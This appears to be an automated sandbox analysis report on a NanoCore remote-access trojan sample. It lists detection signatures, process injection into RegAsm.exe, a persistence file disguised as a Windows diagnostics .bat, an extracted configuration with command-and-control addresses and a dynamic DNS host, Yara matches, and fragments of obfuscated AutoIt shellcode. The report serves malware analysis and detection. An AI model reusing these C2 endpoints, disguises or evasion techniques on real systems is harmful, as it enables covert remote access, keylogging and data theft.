Analysis Report e5bd3238d220c97cd4d6969abb3b33e0

Overview

General Information

Sample Name: e5bd3238d220c97cd4d6969abb3b33e0 (renamed file extension from none to exe)
Analysis ID: 320085
MD5: 7b00ed250c793c95f4d98c637302fb6f
SHA1: 7f8d0c101fa8c5e875aa76c9a9c139d8800867b3
SHA256: 5108996bad93e37f7f6e003be1edf9dba10a99fafc3894f8d4fd01226e10b0a5
Tags: NanoCore

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
AutoIt script contains suspicious strings
Binary is likely a compiled AutoIt script file
Contains functionality to inject code into remote processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Uses dynamic DNS services
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • e5bd3238d220c97cd4d6969abb3b33e0.exe (PID: 2152 cmdline: 'C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe' MD5: 7B00ED250C793C95F4D98C637302FB6F)
    • RegAsm.exe (PID: 4560 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe MD5: 529695608EAFBED00ACA9E61EF333A7C)
  • dhcpmon.exe (PID: 6488 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)
    • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • DiagnosticsHub.StandardCollector.Service.exe.bat (PID: 6976 cmdline: 'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat' MD5: E10CD6FAB33374FB1A0002F89D0BFE45)
    • RegAsm.exe (PID: 7108 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe MD5: 529695608EAFBED00ACA9E61EF333A7C)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"C2: ": ["255.255.255.255", "87.65.28.27"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
    • 0x112dd:$x1: NanoCore.ClientPluginHost
    • 0x43ce5:$x1: NanoCore.ClientPluginHost
    • 0x766ed:$x1: NanoCore.ClientPluginHost
    • 0x1131a:$x2: IClientNetworkHost
    • 0x43d22:$x2: IClientNetworkHost
    • 0x7672a:$x2: IClientNetworkHost
    • 0x14e4d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    • 0x47855:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    • 0x7a25d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.RegAsm.exe.5210000.4.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
    • 0xe75:$x1: NanoCore.ClientPluginHost
    • 0xe8f:$x2: IClientNetworkHost
1.2.RegAsm.exe.5210000.4.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
    • 0xe75:$x2: NanoCore.ClientPluginHost
    • 0x1261:$s3: PipeExists
    • 0x1136:$s4: PipeCreated
    • 0xeb0:$s5: IClientLoggingHost
0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
    • 0xff05:$x1: NanoCore Client.exe
    • 0x1018d:$x2: NanoCore.ClientPluginHost
    • 0x117c6:$s1: PluginCommand
    • 0x117ba:$s2: FileCommand
    • 0x1266b:$s3: PipeExists
    • 0x18422:$s4: PipeCreated
    • 0x101b7:$s5: IClientLoggingHost
0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security

        Sigma Overview

        System Summary:

        Sigma detected: NanoCore
        Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 4560, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Signature Overview

        AV Detection:

        Antivirus / Scanner detection for submitted sample
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe | Avira: detected
        Antivirus detection for dropped file
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Avira: detection malicious, Label: HEUR/AGEN.1100084
        Found malware configuration
        Source: RegAsm.exe.7108.14.memstr | Malware Configuration Extractor: NanoCore {"C2: ": ["255.255.255.255", "87.65.28.27"], "Version: ": "NanoCore Client, Version=1.2.2.0"}
        Multi AV Scanner detection for submitted file
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe | ReversingLabs: Detection: 68%
        Yara detected Nanocore RAT
        Source: 1.2.RegAsm.exe.400000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
        Source: 14.2.RegAsm.exe.400000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe | Code function: 0_2_00A24696 GetFileAttributesW,FindFirstFileW,FindClose
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe | Code function: 0_2_00A23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe | Code function: 0_2_00A2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe | Code function: 0_2_00A2C93C FindFirstFileW,FindClose
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe | Code function: 0_2_00A2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe | Code function: 0_2_00A2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe | Code function: 0_2_00A2F65E FindFirstFileW,Sleep,FindNextFileW,FindClose
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe | Code function: 0_2_00A23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 12_2_009E4696 GetFileAttributesW,FindFirstFileW,FindClose
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 12_2_009E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 12_2_009EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 12_2_009EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 12_2_009EF65E FindFirstFileW,Sleep,FindNextFileW,FindClose
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 12_2_009EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 12_2_009EC93C FindFirstFileW,FindClose
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 12_2_009E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 12_2_009EBF27 FindFirstFileW,FindNextFileW,FindClose

        Networking:

        Uses dynamic DNS services
        Source: unknown | DNS query: name: windowslivesoffice.ddns.net
        Source: global traffic | TCP traffic: 192.168.2.7:49715 -> 87.65.28.27:20377
        Source: Joe Sandbox View | IP Address: 87.65.28.27
        Source: Joe Sandbox View | ASN Name: PROXIMUS-ISP-ASBE
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe | Code function: 0_2_00A325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile
        Source: unknown | DNS traffic detected: queries for: windowslivesoffice.ddns.net
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe | Code function: 0_2_00A3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe | Code function: 0_2_00A20219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
        Source: RegAsm.exe, 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp | Binary or memory string: RegisterRawInputDevices
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe | Code function: 0_2_00A4CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | Code function: 12_2_00A0CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

        E-Banking Fraud:

        Yara detected Nanocore RAT

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
        Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
        Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
        Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.RegAsm.exe.5210000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
        Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
        Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
        Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
        Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
        Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
        Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
        AutoIt script contains suspicious strings
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, AutoIt Script: 1 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, AutoIt Script: 792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXH
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr, AutoIt Script: 1 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr, AutoIt Script: 792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXH
        Binary is likely a compiled AutoIt script file
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe, Code function: This is a third-party compiled AutoIt script.
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, String found in binary or memory: This is a third-party compiled AutoIt script.
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000000.249216138.0000000000A75000.00000002.00020000.sdmp, String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat, Code function: This is a third-party compiled AutoIt script.
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat, String found in binary or memory: This is a third-party compiled AutoIt script.
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat, 0000000C.00000003.298583525.00000000035B5000.00000004.00000001.sdmp, String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Code function: 1_2_04EB131A NtQuerySystemInformation,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Code function: 1_2_04EB12DF NtQuerySystemInformation,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe, Code function: 0_2_00A240B1: CreateFileW,DeviceIoControl,CloseHandle,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe, Code function: 0_2_00A18858 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe, Code function: 0_2_00A2545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E33C7
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009D4140
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E2405
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F6522
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A40665
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F267E
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E283A
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F89DF
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A40AE2
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A28B13
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009ECD61
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F7006
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009D3190
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009D710E
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C1287
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009EF419
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E16C4
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E1BB8
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F9D05
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E33C7
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009D4140
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E2405
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F6522
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A40665
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00E07AC1
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04D7B068
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04D78798
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04D723A0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04D72FA8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04D7945F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04D7306F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04D79398
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 4_2_04A201B7
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009B7006
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_00993190
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_0099710E
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_00994140
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_00981287
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009AF419
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009B6522
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009A16C4
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009B267E
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009B89DF
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009E8B13
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009B9D05
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009ACD61
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 14_2_02C723A0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 14_2_02C72FA8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 14_2_02C73850
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 14_2_02C7238F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 14_2_02C7306F
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: String function: 009E0D27 appears 70 times
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: String function: 009C7F41 appears 34 times
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: String function: 009E8B40 appears 40 times
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: String function: 009A8B40 appears 37 times
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
